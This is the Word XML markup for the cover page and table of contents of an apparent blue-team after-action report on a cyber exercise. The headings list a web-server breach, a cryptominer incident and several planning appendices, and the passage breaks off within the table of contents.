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5AD4F" w14:textId="276FC9B6" w:rsidR="00616A56" w:rsidRPr="006E26F6" w:rsidRDefault="00BC62B9" w:rsidP="00606E2F">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>After Action Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490FC016" w14:textId="127C3B78" w:rsidR="00832A4D" w:rsidRDefault="00BC62B9" w:rsidP="00832A4D">
      <w:pPr>
        <w:pStyle w:val="Coverpageauthors2"/>
      </w:pPr>
      <w:r>
        <w:t>eHabor – Blue Team 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78110A77" w14:textId="77777777" w:rsidR="00BC62B9" w:rsidRPr="00BC62B9" w:rsidRDefault="00BC62B9" w:rsidP="00BC62B9">
      <w:pPr>
        <w:pStyle w:val="Coverpagestudyinformation"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F3ACAB8" w14:textId="77777777" w:rsidR="005D18F2" w:rsidRDefault="005D18F2" w:rsidP="00233437">
      <w:pPr>
        <w:pStyle w:val="Coverpagestudyinformation"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B4B5FB2" w14:textId="77777777" w:rsidR="005D18F2" w:rsidRDefault="005D18F2" w:rsidP="00233437">
      <w:pPr>
        <w:pStyle w:val="Coverpagestudyinformation"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="167D2D56" w14:textId="5769FDD0" w:rsidR="00AF23BF" w:rsidRPr="006E26F6" w:rsidRDefault="00BC62B9" w:rsidP="00233437">
      <w:pPr>
        <w:pStyle w:val="Coverpagestudyinformation"/>
      </w:pPr>
      <w:r>
        <w:t>4/2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642543EE" w14:textId="77777777" w:rsidR="001E78E3" w:rsidRPr="006E26F6" w:rsidRDefault="001E78E3" w:rsidP="001E78E3">
      <w:pPr>
        <w:pStyle w:val="KansilehtiOpintotiedot"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04ABE6D8" w14:textId="77777777" w:rsidR="001E78E3" w:rsidRPr="006E26F6" w:rsidRDefault="001E78E3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sectPr w:rsidR="001E78E3" w:rsidRPr="006E26F6" w:rsidSect="00964D12">
          <w:headerReference w:type="default" r:id="rId11"/>
          <w:footerReference w:type="default" r:id="rId12"/>
          <w:pgSz w:w="11907" w:h="16839" w:code="9"/>
          <w:pgMar w:top="1134" w:right="1134" w:bottom="1134" w:left="1134" w:header="1128" w:footer="1162" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51C396BA" w14:textId="77777777" w:rsidR="008C3364" w:rsidRPr="006E26F6" w:rsidRDefault="008C3364" w:rsidP="00B75F2C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="577A487E" w14:textId="7F23490E" w:rsidR="00E47B26" w:rsidRPr="006E26F6" w:rsidRDefault="00000000" w:rsidP="00E24C7B">
      <w:pPr>
        <w:pStyle w:val="Descriptioninformationbold"/>
      </w:pPr>
      <w:sdt>
        <w:sdtPr>
          <w:alias w:val="The name(s) of the author(s) of the thesis"/>
          <w:tag w:val="The name(s) of the author(s) of the thesis"/>
          <w:id w:val="2108225502"/>
          <w:lock w:val="sdtLocked"/>
          <w:placeholder>
            <w:docPart w:val="B64C45C3B908A14D91422B08761EE41D"/>
          </w:placeholder>
          <w:text w:multiLine="1"/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="005D18F2">
            <w:t xml:space="preserve"> </w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:alias w:val="Title, Possible subtitle"/>
        <w:tag w:val="Title, Possible subtitle"/>
        <w:id w:val="-1478288129"/>
        <w:lock w:val="sdtLocked"/>
        <w:placeholder>
          <w:docPart w:val="80153073270D884B8C6BCAA3FC384CFF"/>
        </w:placeholder>
        <w:text w:multiLine="1"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="093BEB55" w14:textId="0AD19FD0" w:rsidR="009A5414" w:rsidRPr="006E26F6" w:rsidRDefault="005D18F2" w:rsidP="00E24C7B">
          <w:pPr>
            <w:pStyle w:val="Descriptioninformationbold"/>
          </w:pPr>
          <w:r>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="5ABFE263" w14:textId="7D9624ED" w:rsidR="00232E0D" w:rsidRPr="001A26B4" w:rsidRDefault="00000000" w:rsidP="00E24C7B">
      <w:pPr>
        <w:pStyle w:val="Descriptioninformationnormal"/>
      </w:pPr>
      <w:sdt>
        <w:sdtPr>
          <w:alias w:val="The submission date of the report"/>
          <w:tag w:val="The submission date of the report"/>
          <w:id w:val="-563029027"/>
          <w:lock w:val="sdtLocked"/>
          <w:placeholder>
            <w:docPart w:val="D65329EA88E36A44829CE7F662B4561E"/>
          </w:placeholder>
          <w:text/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="005D18F2">
            <w:t xml:space="preserve"> </w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="005D18F2" w:rsidRPr="001A26B4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00232E0D" w:rsidRPr="001A26B4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:alias w:val="The total number of pages"/>
          <w:tag w:val="The total number of pages"/>
          <w:id w:val="521898902"/>
          <w:lock w:val="sdtLocked"/>
          <w:placeholder>
            <w:docPart w:val="96C8C72DE45E0343B9104BC35C1DCA3F"/>
          </w:placeholder>
          <w:text/>
        </w:sdtPr>
        <w:sdtContent>
          <w:bookmarkStart w:id="0" w:name="_Hlk59002208"/>
          <w:bookmarkEnd w:id="0"/>
          <w:r w:rsidR="005D18F2" w:rsidRPr="001A26B4">
            <w:t xml:space="preserve"> </w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:alias w:val="Degree programme and type of publication"/>
        <w:tag w:val="Degree programme and type of publication"/>
        <w:id w:val="-1683585378"/>
        <w:lock w:val="sdtLocked"/>
        <w:placeholder>
          <w:docPart w:val="A8285C3B2A2DF144AA25182189D8B061"/>
        </w:placeholder>
        <w:text w:multiLine="1"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="0E5CC6E3" w14:textId="2E3598B4" w:rsidR="009A5414" w:rsidRPr="006E26F6" w:rsidRDefault="005D18F2" w:rsidP="00233437">
          <w:pPr>
            <w:pStyle w:val="Descriptioninformationnormal"/>
          </w:pPr>
          <w:r>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="18469A8E" w14:textId="4574DC5F" w:rsidR="00E47B26" w:rsidRPr="006E26F6" w:rsidRDefault="005D18F2" w:rsidP="00E24C7B">
      <w:pPr>
        <w:pStyle w:val="Descriptioninformationnormal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E47B26" w:rsidRPr="006E26F6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:alias w:val="Permission for web publication"/>
          <w:tag w:val="Permission for web publication"/>
          <w:id w:val="-1075352382"/>
          <w:lock w:val="sdtLocked"/>
          <w:placeholder>
            <w:docPart w:val="A29739FF7FF92F40935B9C9AC4D23B9D"/>
          </w:placeholder>
          <w:text/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="67A3F3E1" w14:textId="692EA31D" w:rsidR="00E47B26" w:rsidRPr="006E26F6" w:rsidRDefault="00000000" w:rsidP="00E24C7B">
      <w:pPr>
        <w:pStyle w:val="Descriptioninformationnormal"/>
      </w:pPr>
      <w:sdt>
        <w:sdtPr>
          <w:alias w:val="Language of publication"/>
          <w:tag w:val="Language of publication"/>
          <w:id w:val="-1772241458"/>
          <w:lock w:val="sdtLocked"/>
          <w:placeholder>
            <w:docPart w:val="3BFC903BB1386F49861F4A48BD9BBC7C"/>
          </w:placeholder>
          <w:text/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="005D18F2">
            <w:t xml:space="preserve"> </w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="25E8EA5B" w14:textId="77777777" w:rsidR="005D18F2" w:rsidRPr="001A26B4" w:rsidRDefault="005D18F2" w:rsidP="00D36CEB">
      <w:pPr>
        <w:pStyle w:val="DescriptionAbstract"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A26B4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:alias w:val="Abstract"/>
        <w:tag w:val="Abstract"/>
        <w:id w:val="1274901489"/>
        <w:lock w:val="sdtLocked"/>
        <w:placeholder>
          <w:docPart w:val="AF0156AA46A02C4D8CAF189FA159EDA4"/>
        </w:placeholder>
        <w:text w:multiLine="1"/>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="1DD8CE68" w14:textId="3EE16C4B" w:rsidR="00C03E35" w:rsidRPr="006E26F6" w:rsidRDefault="005D18F2" w:rsidP="005D18F2">
          <w:pPr>
            <w:pStyle w:val="DescriptionAbstract"/>
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:b/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="5CD2C6FC" w14:textId="77EF13E7" w:rsidR="00E47B26" w:rsidRPr="006E26F6" w:rsidRDefault="005D18F2" w:rsidP="005D18F2">
      <w:pPr>
        <w:pStyle w:val="Descriptioninformationbold"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:alias w:val="Keywords/tags"/>
          <w:tag w:val="Keywords/tags"/>
          <w:id w:val="420215678"/>
          <w:lock w:val="sdtLocked"/>
          <w:placeholder>
            <w:docPart w:val="0A9452C405C3B049939415731DB4D054"/>
          </w:placeholder>
          <w:text w:multiLine="1"/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="6DE0F126" w14:textId="3ABA5355" w:rsidR="00115876" w:rsidRDefault="00000000" w:rsidP="005C5BE7">
      <w:pPr>
        <w:pStyle w:val="Descriptioninformationbold"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:sdt>
        <w:sdtPr>
          <w:alias w:val="Miscellaneous (Confidential information)"/>
          <w:tag w:val="Miscellaneous (Confidential information)"/>
          <w:id w:val="-1778329211"/>
          <w:lock w:val="sdtLocked"/>
          <w:placeholder>
            <w:docPart w:val="60B3FC4D31716F4CA89A6EDA43318CD1"/>
          </w:placeholder>
          <w:text/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="005D18F2">
            <w:t xml:space="preserve"> </w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="0037429C" w:rsidRPr="009166C1">
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>Contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AA3482" w14:textId="77777777" w:rsidR="00A9285C" w:rsidRPr="006E26F6" w:rsidRDefault="00A9285C" w:rsidP="005C5BE7">
      <w:pPr>
        <w:pStyle w:val="Descriptioninformationbold"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D2978F0" w14:textId="3C81CC24" w:rsidR="009166C1" w:rsidRDefault="00C03E35">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="fi-FI" w:eastAsia="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E26F6">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="006E26F6">
        <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
      </w:r>
      <w:r w:rsidRPr="006E26F6">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc163900517" w:history="1">
        <w:r w:rsidR="009166C1" w:rsidRPr="00A5470C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
        <w:r w:rsidR="009166C1">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:b w:val="0"/>
            <w:color w:val="auto"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="fi-FI" w:eastAsia="fi-FI"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009166C1" w:rsidRPr="00A5470C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Introduction</w:t>
        </w:r>
        <w:r w:rsidR="009166C1">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009166C1">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009166C1">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc163900517 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009166C1">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009166C1">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005D5567">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r w:rsidR="009166C1">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2B115C24" w14:textId="225C6B4D" w:rsidR="009166C1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="fi-FI" w:eastAsia="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc163900518" w:history="1">
        <w:r w:rsidR="009166C1" w:rsidRPr="00A5470C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r w:rsidR="009166C1">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:b w:val="0"/>
            <w:color w:val="auto"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="fi-FI" w:eastAsia="fi-FI"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009166C1" w:rsidRPr="00A5470C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Obeservastions and analysis of the exercise</w:t>
        </w:r>
        <w:r w:rsidR="009166C1">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009166C1">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009166C1">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc163900518 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009166C1">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009166C1">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005D5567">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r w:rsidR="009166C1">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="54089975" w14:textId="17EDA96A" w:rsidR="009166C1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="fi-FI" w:eastAsia="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc163900519" w:history="1">
        <w:r w:rsidR="009166C1" w:rsidRPr="00A5470C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r w:rsidR="009166C1">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:b w:val="0"/>
            <w:color w:val="auto"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="fi-FI" w:eastAsia="fi-FI"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009166C1" w:rsidRPr="00A5470C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Major incident 1 – WWW-server breach</w:t>
        </w:r>
        <w:r w:rsidR="009166C1">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009166C1">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009166C1">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc163900519 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009166C1">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009166C1">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005D5567">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r w:rsidR="009166C1">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="68F4092C" w14:textId="0CE87AFE" w:rsidR="009166C1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="fi-FI" w:eastAsia="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc163900520" w:history="1">
        <w:r w:rsidR="009166C1" w:rsidRPr="00A5470C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r w:rsidR="009166C1">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:b w:val="0"/>
            <w:color w:val="auto"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="fi-FI" w:eastAsia="fi-FI"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009166C1" w:rsidRPr="00A5470C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Major incident 2 – Cryptominer on servers</w:t>
        </w:r>
        <w:r w:rsidR="009166C1">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009166C1">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009166C1">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc163900520 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009166C1">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009166C1">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005D5567">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r w:rsidR="009166C1">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="231C2AF3" w14:textId="519627DE" w:rsidR="009166C1" w:rsidRDefault="009166C1">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="fi-FI" w:eastAsia="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc163900522" w:history="1">
        <w:r w:rsidRPr="00A5470C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Appendix A - Business Model</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc163900522 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005D5567">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="35ECA4E1" w14:textId="5762C24E" w:rsidR="009166C1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="fi-FI" w:eastAsia="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc163900526" w:history="1">
        <w:r w:rsidR="009166C1" w:rsidRPr="00A5470C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Appendix B - Risk Management Model</w:t>
        </w:r>
        <w:r w:rsidR="009166C1">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009166C1">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009166C1">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc163900526 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009166C1">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009166C1">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005D5567">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
        <w:r w:rsidR="009166C1">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4ACDE373" w14:textId="5A918BC7" w:rsidR="009166C1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="fi-FI" w:eastAsia="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc163900527" w:history="1">
        <w:r w:rsidR="009166C1" w:rsidRPr="00A5470C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Appendix C - Incident Response Plan</w:t>
        </w:r>
        <w:r w:rsidR="009166C1">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009166C1">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009166C1">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc163900527 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009166C1">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009166C1">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005D5567">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
        <w:r w:rsidR="009166C1">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="11C36121" w14:textId="167DC352" w:rsidR="009166C1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="fi-FI" w:eastAsia="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc163900537" w:history="1">
        <w:r w:rsidR="009166C1" w:rsidRPr="00A5470C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Appendix D - Communications Plans</w:t>
        </w:r>
        <w:r w:rsidR="009166C1">
          <w:rPr>
